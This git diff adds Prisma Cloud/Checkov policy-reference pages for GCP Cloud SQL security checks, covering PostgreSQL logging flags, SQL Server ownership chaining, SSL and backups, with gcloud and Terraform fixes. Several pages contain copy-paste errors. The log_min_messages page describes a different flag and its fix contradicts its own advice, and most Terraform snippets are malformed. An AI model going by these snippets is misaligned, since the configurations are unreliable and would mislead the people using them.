b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-2.adoc new file mode 100644 index 000000000..4b33150b3 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-2.adoc @@ -0,0 +1,107 @@ +== GCP PostgreSQL instance with log_checkpoints database flag is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6058e452-648f-44d3-a6c0-4e3616f11210 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py[CKV_GCP_51] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling *log_checkpoints* causes checkpoints and restart points to be logged in the server log. +Some statistics are included in the log messages, including the number of buffers written, and the time spent writing them. +This parameter can only be set in the *postgresql.conf* file or on the server command line. +We recommended you set the *log_checkpoints* database flag for the Cloud SQL PostgreSQL instance to *on*. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * log_checkpoints* from the drop-down menu, and set its value to * On*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database instances using the following command: `gcloud sql instances list` + +. Configure the `log_checkpoints` database flag for every Cloud SQL PosgreSQL database instance using the below command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_checkpoints=on` ++ +NOTE: This command will overwrite all previously set database flags. To keep those flags, and add new ones, include the values for all flags to be set on the instance. +Any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*=*). + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_checkpoints", value: by default set to "off" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "POSTGRES_11" + region = "us-central1" + + settings { ++ database_flags { ++ name = "log_checkpoints" ++ value = "on" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-3.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-3.adoc new file mode 100644 index 000000000..b9c431540 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-3.adoc @@ -0,0 +1,110 @@ +== GCP PostgreSQL instance database flag log_connections is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ae01f28b-cfee-4c1d-b089-0cd0c1151f0d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py[CKV_GCP_52] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +PostgreSQL does not log attempted connections by default. +Enabling the *log_connections* setting creates log entries for each attempted connection to the server, along with successful completion of client authentication. +This information can be useful in troubleshooting issues and to determine any unusual connection attempts to the server. +We recommend you set the *log_connections* database flag for Cloud SQL PostgreSQL instances to *on*. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* for which you want to enable the database flag. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * log_connections* from the drop-down menu, and set the value to * on*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database instances using the following command: `gcloud sql instances list` + +. Configure the log_connections database flag for every Cloud SQL PosgreSQL database instance using the following command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_connections=on` ++ +NOTE: This command will overwrite all previously set database flags. To keep those and add new ones, include the values for all flags to be set on the instance; +any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (=).se flags. +To keep those and add new ones, include the values for all flags to be set on the instance. +Any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*=*). + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_connections", value: by default set to "off" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "POSTGRES_11" + region = "us-central1" + + settings { ++ database_flags { ++ name = "log_connections" ++ value = "on" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-4.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-4.adoc new file mode 100644 index 000000000..92464b00a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-4.adoc @@ -0,0 +1,108 @@ +== GCP PostgreSQL instance database flag log_disconnections is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 286e7808-c15c-4759-a0c4-759298ee7769 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py[CKV_GCP_53] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling the *log_disconnections* database flag logs the end of each session, including the session duration. +PostgreSQL does not log session details by default, including duration and session end details. +Enabling the *log_disconnections* database flag creates log entries at the end of each session, useful when troubleshooting issues and determining unusual activity across a time period. +The *log_disconnections* and *log_connections* work hand in hand and usually the pair would be enabled/disabled together. +We recommended you set the *log_disconnections* flag for a PostgreSQL instance to *On*. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * log_disconnections* from the drop-down menu, and set its value to * On*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database Instances using the following command: `gcloud sql instances list` + +. Configure the log_disconnections database flag for every Cloud SQL PosgreSQL database instance using the below command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_disconnections=on` ++ +NOTE: This command will overwrite all previously set database flags. To keep those flags, and add new ones, include the values for all flags to be set on the instance. +Any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*=*). + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_disconnections", value: by default set to "off" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "POSTGRES_11" + region = "us-central1" + + settings { ++ database_flags { ++ name = "log_disconnections" ++ value = "on" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-5.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-5.adoc new file mode 100644 index 000000000..75da81872 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-5.adoc @@ -0,0 +1,109 @@ +== GCP PostgreSQL instance database flag log_lock_waits is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9570d08f-1795-493f-b88d-7a7a68078ff6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py[CKV_GCP_54] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Deadlock timeout defines the time to wait on a lock before checking for any conditions. +Frequent runovers on deadlock timeout can be an indication of an underlying issue. +Log these waits on locks using the *log_lock_waits* database flag and use the information to identify poor performance due to locking delays, or if a specially-crafted SQL is attempting to starve resources through holding locks for excessive amounts of time. +We recommended you set the *log_lock_waits* flag for a PostgreSQL instance to *On*. +This will create a log for any session and allow you to identify waits that take longer than the allotted *deadlock_timeout* time to acquire a lock. + +//// +=== Fix - Runtime +Remediation + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * log_lock_waits* from the drop-down menu, and set its value to * On*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database instances using the following command: `gcloud sql instances list` + +. Configure the log_lock_waits database flag for every Cloud SQL PosgreSQL database instance using the below command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_lock_waits=on` ++ +NOTE: This command will overwrite all database flags previously set. To keep these flags, and add new ones, include the values for all flags to be set on the instance. +Any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*=*). + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_lock_waits", value: by default set to "off" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "POSTGRES_11" + region = "us-central1" + + settings { ++ database_flags { ++ name = "log_lock_waits" ++ value = "on" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-6.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-6.adoc new file mode 100644 index 000000000..1c068c7a2 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-6.adoc @@ -0,0 +1,116 @@ +== GCP PostgreSQL instance database flag log_min_messages is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 86150e32-f69c-400b-9bc2-444b03795545 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py[CKV_GCP_55] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The *log_min_error_statement* database flag defines the minimum message severity level that is considered to be an error statement. +Messages for error statements are logged with the SQL statement. +Valid values include: DEBUG5, DEBUG4, DEBUG3, DEBUG2, DEBUG1, INFO, NOTICE, WARNING, ERROR, LOG, FATAL, and PANIC. +Each severity level includes subsequent levels. +Deadlock timeout defines the time to wait on a lock before checking for any conditions. +Frequent runovers on deadlock timeout can be an indication of an underlying issue. +Log these waits on locks using the *log_lock_waits* database flag and use the information to identify poor performance due to locking delays, or if a specially-crafted SQL is attempting to starve resources through holding locks for excessive amounts of time. +We recommend you set the *log_min_error_statement* flag for PostgreSQL database instances in accordance with your organization's logging policy for auditing purposes. +Auditing helps you troubleshoot operational problems, and also permits forensic analysis. +If *log_min_error_statement* is not set to the correct value, messages may not be classified as error messages appropriately. +Considering general log messages as error messages would make it difficult to find actual errors, while considering only stricter severity levels as error messages may skip actual errors to log their SQL statements. + +NOTE: To effectively turn off logging failing statements, set this parameter to PANIC. +ERROR is considered the best practice setting. +Changes should only be made in accordance with the organization's logging policy. + + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * log_min_error_statement* from the drop-down menu, and set an appropriate value. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database Instances using the following command: `gcloud sql instances list` + +. Configure the log_min_error_statement database flag for every Cloud SQL PosgreSQL database instance using the below command. ++ +`gcloud sql instances patch INSTANCE_NAME --database-flags log_min_error_statement=& lt;DEBUG5|DEBUG4|DEBUG3|DEBUG2|DEBUG1|INFO|NOTICE|WARNI NG|ERROR|LOG|FATAL|PANIC>` ++ +NOTE: This command will overwrite all database flags previously set. To keep those and add new ones, include the values for all flags to be set on the instance; +any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*= *). + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_min_messages", value: by default set to "ERROR" Argument value can be one of the following: `DEBUG5`, `DEBUG4`, `DEBUG3`, `DEBUG2`, `DEBUG1`, `INFO`, `NOTICE`, `WARNING`, `ERROR`, `LOG`, `FATAL`, and `PANIC` + + +[source,go] +---- +resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "POSTGRES_11" + region = "us-central1" + + settings { ++ database_flags { ++ name = "log_min_messages" ++ value = "DEBUG5" + } + } +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-7.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-7.adoc new file mode 100644 index 000000000..57d25b1de --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-7.adoc @@ -0,0 +1,113 @@ +== GCP PostgreSQL instance database flag log_temp_files is not set to 0 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2b9b082c-7e83-4695-92ab-8eca4c5dd4fd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py[CKV_GCP_56] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +PostgreSQL can create a temporary file for actions such as sorting, hashing and temporary query results when these operations exceed *work_mem*. +The *log_temp_files* flag controls logging names and the file size when it is deleted. +Configuring *log_temp_files* to zero (*0*) causes all temporary file information to be logged, while positive values log only files whose size are greater than or equal to the specified number of kilobytes. +A value of *-1* disables temporary file information logging. +We recommend you set the *log_temp_files* database flag for Cloud SQL PostgreSQL instances is set to zero (*0*). +If temporary files are not logged, it may be difficult to identify potential performance issues caused by either poor application coding, or deliberate resource starvation attempts. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * log_temp_files* from the drop-down menu, and set its value to * 0*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database instances using the following command: `gcloud sql instances list` + +. Configure the log_temp_files database flag for every Cloud SQL PosgreSQL database instance using the below command. ++ +``gcloud sql instances patch INSTANCE_NAME --database-flags log_temp_files=``0`` + +NOTE: This command will overwrite all database flags previously set. ++ +To keep those and add new ones, include the values for all flags to be set on the instance; ++ +any flag not specifically included is set to its default value. ++ +For flags that do not take a value, specify the flag name followed by an equals sign ("="). +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_temp_files", value: by default set to "-1" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "POSTGRES_11" + region = "us-central1" + + settings { ++ database_flags { ++ name = "log_temp_files" ++ value = "0" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-8.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-8.adoc new file mode 100644 index 000000000..907a3bf6a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-8.adoc @@ -0,0 +1,107 @@ +== GCP PostgreSQL instance database flag log_min_duration_statement is not set to -1 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 45f30dc1-4253-4afb-987a-b09e26bfc166 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py[CKV_GCP_57] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Logging SQL statements may include sensitive information that should not be recorded in logs. +This recommendation is applicable to PostgreSQL database instances. +The *log_min_duration_statement* database flag defines the minimum amount of execution time in milliseconds of a statement where the total duration of the statement is logged. +We recommend you ensure the *log_min_duration_statement* database flag for Cloud SQL PostgreSQL instances is disabled. +To achieve this, set the value to *-1*. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * og_min_duration_statement* from the drop-down menu, and set its value to * -1*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database instances using the following command: `gcloud sql instances list` + +. Configure the `log_min_duration_statement` flag for every Cloud SQL PosgreSQL database instance using the below command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_min_duration_statement=-1` ++ +NOTE: This command will overwrite all database flags previously set. To keep those and add new ones, include the values for all flags to be set on the instance; any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*=*). + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_min_duration_statement", value: by default set to -1 + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "POSTGRES_11" + region = "us-central1" + + settings { ++ database_flags { ++ name = "log_min_duration_statement" ++ value = "-1" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-9.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-9.adoc new file mode 100644 index 000000000..2c720193d --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-9.adoc @@ -0,0 +1,111 @@ +== GCP SQL Server instance database flag 'cross db ownership chaining' is enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fc6634c3-7ab9-4a84-a447-09499b1e418c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py[CKV_GCP_58] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use the *cross db ownership chaining* database flag to configure cross-database ownership chaining for an instance of Microsoft SQL Server. +This server option allows you to control cross-database ownership chaining at database-level, or to allow cross-database ownership chaining for all databases. +We recommend you disable the *cross db ownership chaining* flag for Cloud SQL SQL Server instances, by setting it to *Off*. +Enabling *cross db ownership chaining* is only effective when all of the databases hosted by the instance of SQL Server participate in cross-database ownership chaining, and you are aware of the security implications of this setting. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * cross db ownership chaining* from the drop-down menu, and set its value to * Off*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database instances using the following command: `gcloud sql instances list` + +. Configure the * cross db ownership chaining* database flag for every Cloud SQL SQL Server database instance using the below command: +---- +gcloud sql instances patch INSTANCE_NAME +--database-flags "cross db ownership chaining=off" +---- ++ +NOTE: This command will overwrite all database flags previously set. To keep those flags, and add new ones, include the values for all flags to be set on the instance. +Any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (* =*). + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "SQLSERVER_* " settings::database_flags: key:"cross db ownership chaining", value: by default set to "on" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "SQLSERVER_2017_STANDARD" + region = "us-central1" + + settings { ++ database_flags { ++ name = "cross db ownership chaining"" ++ value = "off" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/cloud-sql-policies.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/cloud-sql-policies.adoc new file mode 100644 index 000000000..f8f5178fc --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/cloud-sql-policies.adoc @@ -0,0 +1,64 @@ +== Cloud Sql Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-sql-1.adoc[GCP MySQL instance with local_infile database flag is not disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py[CKV_GCP_50] +|LOW + + +|xref:bc-gcp-sql-10.adoc[GCP SQL Server instance database flag 'contained database authentication' is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py[CKV_GCP_59] +|MEDIUM + + +|xref:bc-gcp-sql-11.adoc[GCP Cloud SQL database instances have public IPs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py[CKV_GCP_60] +|LOW + + +|xref:bc-gcp-sql-2.adoc[GCP PostgreSQL instance with log_checkpoints database flag is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py[CKV_GCP_51] +|LOW + + +|xref:bc-gcp-sql-3.adoc[GCP PostgreSQL instance database flag log_connections is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py[CKV_GCP_52] +|LOW + + +|xref:bc-gcp-sql-4.adoc[GCP PostgreSQL instance database flag log_disconnections is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py[CKV_GCP_53] +|LOW + + +|xref:bc-gcp-sql-5.adoc[GCP PostgreSQL instance database flag log_lock_waits is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py[CKV_GCP_54] +|LOW + + +|xref:bc-gcp-sql-6.adoc[GCP PostgreSQL instance database flag log_min_messages is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py[CKV_GCP_55] +|LOW + + +|xref:bc-gcp-sql-7.adoc[GCP PostgreSQL instance database flag log_temp_files is not set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py[CKV_GCP_56] +|LOW + + +|xref:bc-gcp-sql-8.adoc[GCP PostgreSQL instance database flag log_min_duration_statement is not set to -1] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py[CKV_GCP_57] +|LOW + + +|xref:bc-gcp-sql-9.adoc[GCP SQL Server instance database flag 'cross db ownership chaining' is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py[CKV_GCP_58] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-1.adoc new file mode 100644 index 000000000..19f11ec33 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-1.adoc @@ -0,0 +1,62 @@ +== GCP SQL Instances do not have SSL configured for incoming connections + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b497449f-7a19-49e0-a715-8d0cc95090e9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py[CKV_GCP_6] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL and SQL Server. +It offers data encryption at rest and in transit, Private connectivity with VPC and user-controlled network access with firewall protection. +Cloud SQL creates a server certificate automatically when a new instance is created. +We recommend you enforce all connections to use SSL/TLS. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "google_sql_database_instance" "main" { + name = "main-instance" + database_version = "POSTGRES_14" + region = "us-central1" + + settings { + # Second-generation instance tiers are based on the machine + # type. See argument reference below. + tier = "db-f1-micro" + ip_configuration { + require_ssl = true + } + } +} +---- + + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-2.adoc new file mode 100644 index 000000000..23026cd29 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-2.adoc @@ -0,0 +1,54 @@ +== GCP SQL database instance does not have backup configuration enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8c45d706-65cc-440f-a60c-d635a3ad503a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py[CKV_GCP_14] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL and SQL Server. +It offers data encryption at rest and in transit, Private connectivity with VPC and user-controlled network access with firewall protection. +Backups provide a way to restore a Cloud SQL instance to recover lost data or recover from a problem with your instance. +We recommend you enable automated backups for instances that contain data of high importance. + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "main" { + name = "main-instance" + database_version = "POSTGRES_14" + region = "us-central1" + settings { + backup_configuration { + enabled = True + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-3.adoc new file mode 100644 index 000000000..a7385d22e --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-3.adoc @@ -0,0 +1,92 @@ +== GCP BigQuery dataset is publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 181a00f7-9ca4-45a7-9e2a-b8ebd12223ff + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py[CKV_GCP_15] + +|Severity +|HIGH + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* GCP BigQuery dataset is publicly accessible* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 181a00f7-9ca4-45a7-9e2a-b8ebd12223ff + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py[CKV_GCP_15] + +|Severity +|HIGH + +|Subtype +|Build +, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +Dataset-level permissions help determine which users, groups, and service accounts are allowed to access tables, views, and 